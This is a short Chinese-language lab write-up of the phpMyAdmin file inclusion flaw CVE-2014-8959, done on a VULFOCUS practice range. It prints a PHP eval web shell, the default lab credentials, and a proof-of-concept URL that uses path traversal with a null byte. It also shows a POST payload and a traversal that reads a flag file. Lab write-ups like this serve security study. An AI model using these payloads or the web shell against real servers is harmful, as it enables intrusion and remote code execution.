1.1漏洞描述
| 漏洞编号 | CVE-2014-8959 |
| 漏洞类型 | 文件包含 |
| 漏洞等级 | 高危 |
| 漏洞环境 | Windows |
| 漏洞名称 | phpmyadmin 文件包含(CVE-2014-8959) |
描述: phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。 访问http://ip:port/pma即可进入phpmyadmin。http://ip:port/下有测试账号密码,包含根目录下1.gif,其内容为:<?php@eval($_POST[a]);?>
1.2漏洞等级
高危
1.3影响版本
phpMyAdmin
1.4漏洞复现
1.4.1.基础环境
| 靶场 | VULFOCUS |
| 工具 | BurpSuite |
1.4.2.前提
-
网站后台地址:/pma
-
后台管理账密:pmatest/pmatest
1.5深度利用
1.5.1 漏洞点
POC:
http://ip:port/pma/gis_data_editor.php?token=4320dfa8b951d131f1a71891bbb2edbd&&gis_data[gis_type]=/../../../../1.gif%00
(使用自己拦截到的token)
post提交:
a=phpinfo();
查看/tmp/flag
/../../../../../../../../../../tmp/flag%00
拿到flag
flag-{bmh73c07be5-156d-47eb-ab2d-9a3e93cc53f4}
1.6漏洞挖掘
1.6.1指纹信息
1.7修复建议
-
升级
-
打补丁
-
上设备
